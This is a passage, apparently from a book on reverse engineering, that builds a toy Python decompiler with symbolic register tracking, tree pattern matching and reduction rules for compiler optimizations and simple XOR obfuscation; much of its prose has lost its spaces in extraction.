Manydeveloperswith OOP44intheirmindwillcreatesomekindofclass. Otherdevelopermaybewilluse
“varianttype”.
I’llusesimplestpossiblewayofrepresentingthisstructure: aPythontuple. Firstelementoftuplecanbe
astring: either“EXPR_OP”foroperation,“EXPR_SYMBOL”forsymbolor“EXPR_VALUE”forvalue. Incaseof
symbolorvalue,itfollowsthestring. Incaseofoperation,thestringfollowedbyanothertuples.
Nodetypeandoperationtypearestoredasplainstrings—tomakedebuggingoutputeasiertoread.
Thereareconstructors inourcode,in OOPsense:
44Object-orientedprogramming
40
def create_val_expr (val):
return ("EXPR_VALUE", val)
def create_symbol_expr (val):
return ("EXPR_SYMBOL", val)
def create_binary_expr (op, op1, op2):
return ("EXPR_OP", op, op1, op2)
Therearealso accessors:
def get_expr_type(e):
return e[0]
def get_symbol (e):
assert get_expr_type(e)=="EXPR_SYMBOL"
return e[1]
def get_val (e):
assert get_expr_type(e)=="EXPR_VALUE"
return e[1]
def is_expr_op(e):
return get_expr_type(e)=="EXPR_OP"
def get_op (e):
assert is_expr_op(e)
return e[1]
def get_op1 (e):
assert is_expr_op(e)
return e[2]
def get_op2 (e):
assert is_expr_op(e)
return e[3]
Thetemperatureconversionexpressionwejustsawwillberepresentedas:
"EXPR_OP"
"/"
"EXPR_OP"
"*"
"EXPR_OP"
"-"
"EXPR_SYMBOL"
"arg1"
"EXPR_VALUE"
32
"EXPR_VALUE"
5
"EXPR_VALUE"
9
...orasPythonexpression:
('EXPR_OP', '/',
('EXPR_OP', '*',
('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)),
('EXPR_VALUE', 5)),
('EXPR_VALUE', 9))
Infact,thisis AST45initssimplestform. ASTsareusedheavilyincompilers.
7.3 Simple examples
Let’sstartwithsimplestexample:
45Abstractsyntaxtree
41
mov rax, rdi
imul rax, rsi
Atstart,thesesymbolsareassignedtoregisters:RAX=initial_RAX,RBX=initial_RBX,RDI=arg1,RSI=arg2,
RDX=arg3,RCX=arg4.
WhenwehandleMOVinstruction,wejustcopyexpressionfromRDItoRAX.WhenwehandleIMULinstruc-
tion,wecreateanewexpression,addingtogetherexpressionsfromRAXandRSIandputtingresultintoRAX
again.
Icanfeedthistodecompilerandwewillseehowregister’sstateischangedthroughprocessing:
python td.py --show-registers --python-expr tests/mul.s
...
line=[mov rax, rdi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_SYMBOL', 'arg1')
line=[imul rax, rsi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
...
result=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
IMULinstructionismappedto“*”string,andthennewexpressionisconstructedin handle_binary_op() ,
whichputsresultintoRAX.
Inthisoutput,thedatastructuresaredumpedusingPython str()function,whichdoesmostlythesame,
asprint().
Outputisbulky,andwecanturnoffPythonexpressionsoutput,andseehowthisinternaldatastructure
canberenderedneatlyusingourinternal expr_to_string() function:
python td.py --show-registers tests/mul.s
...
line=[mov rax, rdi]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=arg1
line=[imul rax, rsi]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=(arg1 * arg2)
...
result=(arg1 * arg2)
Slightlyadvancedexample:
imul rdi, rsi
lea rax, [rdi+rdx]
LEAinstructionistreatedjustasADD.
42
python td.py --show-registers --python-expr tests/mul_add.s
...
line=[imul rdi, rsi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[lea rax, [rdi+rdx]]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
rax=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2')), ('EXPR_SYMBOL', 'arg3')
)
...
result=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2')), ('EXPR_SYMBOL', '
arg3'))
Andagain,let’sseethisexpressiondumpedneatly:
python td.py --show-registers tests/mul_add.s
...
result=((arg1 * arg2) + arg3)
Nowanotherexample,whereweuse2inputarguments:
imul rdi, rdi, 1234
imul rsi, rsi, 5678
lea rax, [rdi+rsi]
python td.py --show-registers --python-expr tests/mul_add3.s
...
line=[imul rdi, rdi, 1234]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[imul rsi, rsi, 5678]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678))
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[lea rax, [rdi+rsi]]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678))
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234)), ('EXPR_OP', '*', ('
EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678)))
...
result=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234)), ('EXPR_OP', '*', ('
EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678)))
...andnowneatoutput:
43
python td.py --show-registers tests/mul_add3.s
...
result=((arg1 * 1234) + (arg2 * 5678))
Nowconversionprogram:
mov rax, rdi
sub rax, 32
imul rax, 5
mov rbx, 9
idiv rbx
Youcansee,howregister’sstateischangedoverexecution(orparsing).
Raw:
python td.py --show-registers --python-expr tests/fahr_to_celsius.s
...
line=[mov rax, rdi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_SYMBOL', 'arg1')
line=[sub rax, 32]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32))
line=[imul rax, 5]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5))
line=[mov rbx, 9]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_VALUE', 9)
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5))
line=[idiv rbx]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_VALUE', 9)
rdx=('EXPR_OP', '%', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('
EXPR_VALUE', 5)), ('EXPR_VALUE', 9))
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '/', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('
EXPR_VALUE', 5)), ('EXPR_VALUE', 9))
...
result=('EXPR_OP', '/', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('
EXPR_VALUE', 5)), ('EXPR_VALUE', 9))
Neat:
python td.py --show-registers tests/fahr_to_celsius.s
...
line=[mov rax, rdi]
44
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=arg1
line=[sub rax, 32]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=(arg1 - 32)
line=[imul rax, 5]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
line=[mov rbx, 9]
rcx=arg4
rsi=arg2
rbx=9
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
line=[idiv rbx]
rcx=arg4
rsi=arg2
rbx=9
rdx=(((arg1 - 32) * 5) % 9)
rdi=arg1
rax=(((arg1 - 32) * 5) / 9)
...
result=(((arg1 - 32) * 5) / 9)
ItisinterestingtonotethatIDIVinstructionalsocalculatesreminderofdivision,anditisplacedintoRDX
register. It’snotused,butisavailableforuse.
Thisishowquotientandremainderarestoredinregisters:
def handle_unary_DIV_IDIV (registers, op1):
op1_expr=register_or_number_in_string_to_expr (registers, op1)
current_RAX=registers["rax"]
registers["rax"]=create_binary_expr ("/", current_RAX, op1_expr)
registers["rdx"]=create_binary_expr ("%", current_RAX, op1_expr)
Nowthisis align2grain() function46:
; uint64_t align2grain (uint64_t i, uint64_t grain)
; return ((i + grain-1) & (grain-1));
; rdi=i
; rsi=grain
sub rsi, 1
add rdi, rsi
not rsi
and rdi, rsi
mov rax, rdi
...
line=[sub rsi, 1]
rcx=arg4
rsi=(arg2 - 1)
46Takenfrom https://docs.oracle.com/javase/specs/jvms/se6/html/Compiling.doc.html
45
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=initial_RAX
line=[add rdi, rsi]
rcx=arg4
rsi=(arg2 - 1)
rbx=initial_RBX
rdx=arg3
rdi=(arg1 + (arg2 - 1))
rax=initial_RAX
line=[not rsi]
rcx=arg4
rsi=( (arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=(arg1 + (arg2 - 1))
rax=initial_RAX
line=[and rdi, rsi]
rcx=arg4
rsi=( (arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=((arg1 + (arg2 - 1)) & ( (arg2 - 1)))
rax=initial_RAX
line=[mov rax, rdi]
rcx=arg4
rsi=( (arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=((arg1 + (arg2 - 1)) & ( (arg2 - 1)))
rax=((arg1 + (arg2 - 1)) & ( (arg2 - 1)))
...
result=((arg1 + (arg2 - 1)) & ( (arg2 - 1)))
7.4 Dealing with compiler optimizations
Thefollowingpieceofcode...
mov rax, rdi
add rax, rax
...willbetransormedinto (arg1+arg1) expression. Itcanbereducedto (arg1*2). Ourtoydecompiler
canidentifypatternslikesuchandrewritethem.
# X+X -> X*2
def reduce_ADD1 (expr):
if is_expr_op(expr) and get_op (expr)=="+" and get_op1 (expr)==get_op2 (expr):
return dbg_print_reduced_expr ("reduce_ADD1", expr, create_binary_expr ("*", get_op1 (expr),
create_val_expr (2)))
return expr # no match
Thisfunctionwilljusttest,ifthecurrentnodehas EXPR_OPtype,operationis“+”andbothchildrenare
equaltoeachother. Bytheway,sinceourdatastructureisjusttupleoftuples,Pythoncancomparethem
usingplain“==”operation. Ifthetestingisfinishedsuccessfully,currentnodeisthenreplacedwithanew
expression:wetakeoneofchildren,weconstructanodeof EXPR_VALUE typewith“2”numberinit,andthen
weconstructanodeof EXPR_OPtypewith“*”.
dbg_print_reduced_expr() servingsolelydebuggingpurposes—itjustprintstheoldandthenew(re-
duced)expressions.
Decompileristhentraverseexpressiontreerecursivelyin deep-firstsearch fashion.
def reduce_step (e):
if is_expr_op (e)==False:
return e # expr isn't EXPR_OP, nothing to reduce (we don't reduce EXPR_SYMBOL and EXPR_VAL)
46
if is_unary_op(get_op(e)):
# recreate expr with reduced operand:
return reducers(create_unary_expr (get_op(e), reduce_step (get_op1 (e))))
else:
# recreate expr with both reduced operands:
return reducers(create_binary_expr (get_op(e), reduce_step (get_op1 (e)), reduce_step (get_op2 (e))))
...
# same as "return ...(reduce_MUL1 (reduce_ADD1 (reduce_ADD2 (... expr))))"
reducers=compose([
...
reduce_ADD1, ...
...])
def reduce (e):
print "going to reduce " + expr_to_string (e)
new_expr=reduce_step(e)
if new_expr==e:
return new_expr # we are done here, expression can't be reduced further
else:
return reduce(new_expr) # reduced expr has been changed, so try to reduce it again
Reductionfunctionscalledagainandagain,aslong,asexpressionchanges.
Nowwerunit:
python td.py tests/add1.s
...
going to reduce (arg1 + arg1)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
going to reduce (arg1 * 2)
result=(arg1 * 2)
Sofarsogood,nowwhatifwewouldtrythispieceofcode?
mov rax, rdi
add rax, rax
add rax, rax
add rax, rax
python td.py tests/add2.s
...
working out tests/add2.s
going to reduce (((arg1 + arg1) + (arg1 + arg1)) + ((arg1 + arg1) + (arg1 + arg1)))
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
reduction in reduce_ADD1() (((arg1 * 2) * 2) + ((arg1 * 2) * 2)) -> (((arg1 * 2) * 2) * 2)
going to reduce (((arg1 * 2) * 2) * 2)
result=(((arg1 * 2) * 2) * 2)
Thisiscorrect,buttooverbose.
Wewouldliketorewrite (X*n)*mexpressionto X*(n*m),where nandmarenumbers. Wecandothisby
addinganotherfunctionlike reduce_ADD1() , butthereismuchbetteroption: wecanmakematcherfor
tree. Youcanthinkaboutitasregularexpressionmatcher,butovertrees.
def bind_expr (key):
return ("EXPR_WILDCARD", key)
def bind_value (key):
return ("EXPR_WILDCARD_VALUE", key)
def match_EXPR_WILDCARD (expr, pattern):
return {pattern[1] : expr} # return {key : expr}
47
def match_EXPR_WILDCARD_VALUE (expr, pattern):
if get_expr_type (expr)!="EXPR_VALUE":
return None
return {pattern[1] : get_val(expr)} # return {key : expr}
def is_commutative (op):
return op in ["+", "*", "&", "|", "^"]
def match_two_ops (op1_expr, op1_pattern, op2_expr, op2_pattern):
m1=match (op1_expr, op1_pattern)
m2=match (op2_expr, op2_pattern)
if m1==None or m2==None:
return None # one of match for operands returned False, so we do the same
# join two dicts from both operands:
rt={}
rt.update(m1)
rt.update(m2)
return rt
def match_EXPR_OP (expr, pattern):
if get_expr_type(expr)!=get_expr_type(pattern): # be sure, both EXPR_OP.
return None
if get_op (expr)!=get_op (pattern): # be sure, ops type are the same.
return None
if (is_unary_op(get_op(expr))):
# match unary expression.
return match (get_op1 (expr), get_op1 (pattern))
else:
# match binary expression.
# first try match operands as is.
m=match_two_ops (get_op1 (expr), get_op1 (pattern), get_op2 (expr), get_op2 (pattern))
if m!=None:
return m
# if matching unsuccessful, AND operation is commutative, try also swapped operands.
if is_commutative (get_op (expr))==False:
return None
return match_two_ops (get_op1 (expr), get_op2 (pattern), get_op2 (expr), get_op1 (pattern))
# returns dict in case of success, or None
def match (expr, pattern):
t=get_expr_type(pattern)
if t=="EXPR_WILDCARD":
return match_EXPR_WILDCARD (expr, pattern)
elif t=="EXPR_WILDCARD_VALUE":
return match_EXPR_WILDCARD_VALUE (expr, pattern)
elif t=="EXPR_SYMBOL":
if expr==pattern:
return {}
else:
return None
elif t=="EXPR_VALUE":
if expr==pattern:
return {}
else:
return None
elif t=="EXPR_OP":
return match_EXPR_OP (expr, pattern)
else:
raise AssertionError
Nowhowwewilluseit:
# (X*A)*B -> X*(A*B)
def reduce_MUL1 (expr):
m=match (expr, create_binary_expr ("*", (create_binary_expr ("*", bind_expr ("X"), bind_value ("A"))),
bind_value ("B")))
if m==None:
return expr # no match
return dbg_print_reduced_expr ("reduce_MUL1", expr, create_binary_expr ("*",
m["X"], # new op1
create_val_expr (m["A"] * m["B"]))) # new op2
48
We take input expression, and we also construct pattern to be matched. Matcher works recursively
over both expressions synchronously. Pattern is also expression, but can use two additional node types:
EXPR_WILDCARD andEXPR_WILDCARD_VALUE .Thesenodesaresuppliedwithkeys(storedasstrings).When
matcher encounters EXPR_WILDCARD in pattern, it just stashes current expression and will return it. If
matcherencounters EXPR_WILDCARD_VALUE ,itdoesthesame,butonlyincasethecurrentnodehas EXPR_VALUE
type.
bind_expr() and bind_value() arefunctionswhichcreatenodeswiththetypeswehaveseen.
Allthismeans, reduce_MUL1() functionwillsearchfortheexpressioninform (X*A)*B,where AandB
arenumbers.Inothercases,matcherwillreturninputexpressionuntouched,sothesereducingfunctioncan
bechained.
Nowwhen reduce_MUL1() encounters(sub)expressionweareinterestingin,itwillreturndictionarywith
keysandexpressions. Let’sadd print mcallsomewherebeforereturnandrerun:
python td.py tests/add2.s
...
going to reduce (((arg1 + arg1) + (arg1 + arg1)) + ((arg1 + arg1) + (arg1 + arg1)))
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
{'A': 2, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 2) * 2) -> (arg1 * 4)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
{'A': 2, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 2) * 2) -> (arg1 * 4)
reduction in reduce_ADD1() ((arg1 * 4) + (arg1 * 4)) -> ((arg1 * 4) * 2)
{'A': 4, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 4) * 2) -> (arg1 * 8)
going to reduce (arg1 * 8)
...
result=(arg1 * 8)
Thedictionaryhaskeyswesuppliedplusexpressionsmatcherfound. Wethencanusethemtocreate
newexpressionandreturnit. Numbersarejustsummedwhileformingsecondoperandto“*”opeartion.
Nowareal-worldoptimizationtechnique—optimizingGCCreplacedmultiplicationby31byshiftingand
subtractionoperations:
mov rax, rdi
sal rax, 5
sub rax, rdi
Withoutreductionfunctions, ourdecompilerwilltranslatethisinto ((arg1«5)-arg1) . Wecanreplace
shiftingleftbymultiplication:
# X<<n -> X*(2^n)
def reduce_SHL1 (expr):
m=match (expr, create_binary_expr ("<<", bind_expr ("X"), bind_value ("Y")))
if m==None:
return expr # no match
return dbg_print_reduced_expr ("reduce_SHL1", expr, create_binary_expr ("*", m["X"], create_val_expr (1<<m["
Y"])))
Nowwegetting ((arg1*32)-arg1) . Wecanaddanotherreductionfunction:
# (X*n)-X -> X*(n-1)
def reduce_SUB3 (expr):
m=match (expr, create_binary_expr ("-",
create_binary_expr ("*", bind_expr("X1"), bind_value ("N")),
bind_expr("X2")))
if m!=None and match (m["X1"], m["X2"])!=None:
return dbg_print_reduced_expr ("reduce_SUB3", expr, create_binary_expr ("*", m["X1"], create_val_expr (m
["N"]-1)))
else:
return expr # no match
49
MatcherwillreturntwoX’s,andwemustbeassuredthattheyareequal. Infact,inpreviousversionsof
thistoydecompiler,Ididcomparisonwithplain“==”,anditworked. Butwecanreuse match()function
forthesamepurpose,becauseitwillprocesscommutativeoperationsbetter. Forexample,ifX1is“Q+1”
andX2is“1+Q”,expressionsareequal,butplain“==”willnotwork. Ontheotherside, match()function,
whenencounter“+”operation(oranothercommutativeoperation),anditfailswithcomparison,itwillalso
tryswappedoperandandwilltrytocompareagain.
However, tounderstanditeasier, foramoment, youcanimaginethereis“==”insteadofthesecond
match().
Anyway,hereiswhatwe’vegot:
working out tests/mul31_GCC.s
going to reduce ((arg1 << 5) - arg1)
reduction in reduce_SHL1() (arg1 << 5) -> (arg1 * 32)
reduction in reduce_SUB3() ((arg1 * 32) - arg1) -> (arg1 * 31)
going to reduce (arg1 * 31)
...
result=(arg1 * 31)
Another optimization technique is often seen in ARM thumb code: AND-ing a value with a value like
0xFFFFFFF0,isimplementedusingshifts:
mov rax, rdi
shr rax, 4
shl rax, 4
ThiscodeisquitecommoninARMthumbcode,becauseit’saheadachetoencode32-bitconstantsusing
coupleof16-bitthumbinstructions,whilesingle16-bitinstructioncanshiftby4bitsleftorright.
Also,theexpression (x»4)«4canbejokinglycalledas“twitchingoperator”:I’veheardthe“--i++”expres-
sionwascalledlikethisinRussian-speakingsocialnetworks,itwassomekindofmeme(“operatorpodergi-
vaniya”).
Anyway,thesereductionfunctionswillbeused:
# X>>n -> X / (2^n)
...
def reduce_SHR2 (expr):
m=match(expr, create_binary_expr(">>", bind_expr("X"), bind_value("Y")))
if m==None or m["Y"]>=64:
return expr # no match
return dbg_print_reduced_expr ("reduce_SHR2", expr, create_binary_expr ("/", m["X"],
create_val_expr (1<<m["Y"])))
...
# X<<n -> X*(2^n)
def reduce_SHL1 (expr):
m=match (expr, create_binary_expr ("<<", bind_expr ("X"), bind_value ("Y")))
if m==None:
return expr # no match
return dbg_print_reduced_expr ("reduce_SHL1", expr, create_binary_expr ("*", m["X"], create_val_expr (1<<m["
Y"])))
...
# FIXME: slow
# returns True if n=2^x or popcnt(n)=1
def is_2n(n):
return bin(n).count("1")==1
# AND operation using DIV/MUL or SHL/SHR
# (X / (2^n)) * (2^n) -> X&( ((2^n)-1))
def reduce_MUL2 (expr):
m=match(expr, create_binary_expr ("*", create_binary_expr ("/", bind_expr("X"), bind_value("N1")),
bind_value("N2")))
if m==None or m["N1"]!=m["N2"] or is_2n(m["N1"])==False: # short-circuit expression
return expr # no match
return dbg_print_reduced_expr("reduce_MUL2", expr, create_binary_expr ("&", m["X"],
create_val_expr( (m["N1"]-1)&0xffffffffffffffff)))
50
Nowtheresult:
working out tests/AND_by_shifts2.s
going to reduce ((arg1 >> 4) << 4)
reduction in reduce_SHR2() (arg1 >> 4) -> (arg1 / 16)
reduction in reduce_SHL1() ((arg1 / 16) << 4) -> ((arg1 / 16) * 16)
reduction in reduce_MUL2() ((arg1 / 16) * 16) -> (arg1 & 0xfffffffffffffff0)
going to reduce (arg1 & 0xfffffffffffffff0)
...
result=(arg1 & 0xfffffffffffffff0)
7.4.1 Division using multiplication
Divisionisoftenreplacedbymultiplicationforperformancereasons.
Fromschool-levelarithmetics,wecanrememberthatdivisionby3canbereplacedbymultiplicationby1
3.
Infact,sometimescompilersdosoforfloating-pointarithmetics,forexample,FDIVinstructioninx86code
canbereplacedbyFMUL.AtleastMSVC6.0willreplacedivisionby3bymultiplicationby1
3andsometimes
it’shardtobesure,whatoperationwasinoriginalsourcecode.
ButwhenweoperateoverintegervaluesandCPUregisters, wecan’tusefractions. However, wecan
reworkfraction:
result =x
3=x1
3=x1MagicNumber
3MagicNumber
Giventhefactthatdivisionby 2nisveryfast,wenowshouldfindthat MagicNumber ,forwhichthefollowing
equationwillbetrue: 2n= 3MagicNumber .
Thiscodeperformingdivisionby10:
mov rax, rdi
movabs rdx, 0cccccccccccccccdh
mul rdx
shr rdx, 3
mov rax, rdx
Divisionby 264issomewhathidden:lower64-bitofproductinRAXisnotused(dropped),onlyhigher64-bit
ofproduct(inRDX)isusedandthenshiftedbyadditional3bits.
RDXregisterissetduringprocessingofMUL/IMULlikethis:
def handle_unary_MUL_IMUL (registers, op1):
op1_expr=register_or_number_in_string_to_expr (registers, op1)
result=create_binary_expr ("*", registers["rax"], op1_expr)
registers["rax"]=result
registers["rdx"]=create_binary_expr (">>", result, create_val_expr(64))
In other words, the assembly code we have just seen multiplicates by0cccccccccccccccdh
264+3, or divides by
264+3
0cccccccccccccccdh. Tofinddivisorwejusthavetodividenumeratorbydenominator.
# n = magic number
# m = shifting coefficient
# return = 1 / (n / 2^m) = 2^m / n
def get_divisor (n, m):
return (2**float(m))/float(n)
# (X*n)>>m, where m>=64 -> X/...
def reduce_div_by_MUL (expr):
m=match (expr, create_binary_expr(">>", create_binary_expr ("*", bind_expr("X"), bind_value("N")),
bind_value("M")))
if m==None:
return expr # no match
divisor=get_divisor(m["N"], m["M"])
return dbg_print_reduced_expr ("reduce_div_by_MUL", expr, create_binary_expr ("/", m["X"], create_val_expr (
int(divisor))))
Thisworks,butwehaveaproblem: thisruletakes (arg1*0xcccccccccccccccd)»64 expressionfirstand
findsdivisortobeequalto 1:25.Thisiscorrect:resultisshiftedby3bitsafter(ordividedby8),and 1:258 = 10.
Butourtoydecompilerdoesn’tsupportrealnumbers.
Wecansolvethisprobleminthefollowingway: ifdivisorhasfractionalpart,wepostponereducing,with
ahope,thattwosubsequentrightshiftoperationswillbereducedintosingleone:
51
# (X*n)>>m, where m>=64 -> X/...
def reduce_div_by_MUL (expr):
m=match (expr, create_binary_expr(">>", create_binary_expr ("*", bind_expr("X"), bind_value("N")),
bind_value("M")))
if m==None:
return expr # no match
divisor=get_divisor(m["N"], m["M"])
if math.floor(divisor)==divisor:
return dbg_print_reduced_expr ("reduce_div_by_MUL", expr, create_binary_expr ("/", m["X"],
create_val_expr (int(divisor))))
else:
print "reduce_div_by_MUL(): postponing reduction, because divisor=", divisor
return expr
Thatworks:
working out tests/div_by_mult10_unsigned.s
going to reduce (((arg1 * 0xcccccccccccccccd) >> 64) >> 3)
reduce_div_by_MUL(): postponing reduction, because divisor= 1.25
reduction in reduce_SHR1() (((arg1 * 0xcccccccccccccccd) >> 64) >> 3) -> ((arg1 * 0xcccccccccccccccd) >> 67)
going to reduce ((arg1 * 0xcccccccccccccccd) >> 67)
reduction in reduce_div_by_MUL() ((arg1 * 0xcccccccccccccccd) >> 67) -> (arg1 / 10)
going to reduce (arg1 / 10)
result=(arg1 / 10)
Idon’tknowifthisisbestsolution. Inearlyversionofthisdecompiler,itprocessedinputexpressionin
twopasses: firstpassforeverythingexceptdivisionbymultiplication,andthesecondpassforthelatter. I
don’tknowwhichwayisbetter. Ormaybewecouldsupportrealnumbersinexpressions?
Coupleofwordsaboutbetterunderstandingdivisionbymultiplication.Manypeoplemiss“hidden”division
by232or264,whenlower32-bitpart(or64-bitpart)ofproductisnotused(orjustdropped). Also,thereis
misconceptionthatmoduloinverseisusedhere. Thisisclose,butnotthesamething. ExtendedEuclidean
algorithm is usually used to find magic coefficient , but in fact, this algorithm is rather used to solve the
equation.Youcansolveitusinganyothermethod.Also,needlesstomention,theequationisunsolvablefor
somedivisors,becausethisisdiophantineequation(i.e.,equationallowingresulttobeonlyinteger),since
weworkonintegerCPUregisters,afterall.
7.5 Obfuscation/deobfuscation
Despitesimplicityofourdecompiler,wecanseehowtodeobfuscate(oroptimize)usingseveralsimpletricks.
Forexample,thispieceofcodedoesnothing:
mov rax, rdi
xor rax, 12345678h
xor rax, 0deadbeefh
xor rax, 12345678h
xor rax, 0deadbeefh
Wewouldneedtheserulestotameit:
# (X^n)^m -> X^(n^m)
def reduce_XOR4 (expr):
m=match(expr,
create_binary_expr("^",
create_binary_expr ("^", bind_expr("X"), bind_value("N")),
bind_value("M")))
if m!=None:
return dbg_print_reduced_expr ("reduce_XOR4", expr, create_binary_expr ("^", m["X"],
create_val_expr (m["N"]^m["M"])))
else:
return expr # no match
...
# X op 0 -> X, where op is ADD, OR, XOR, SUB
def reduce_op_0 (expr):
# try each:
for op in ["+", "|", "^", "-"]:
m=match(expr, create_binary_expr(op, bind_expr("X"), create_val_expr (0)))
if m!=None:
52
return dbg_print_reduced_expr ("reduce_op_0", expr, m["X"])
# default:
return expr # no match
working out tests/t9_obf.s
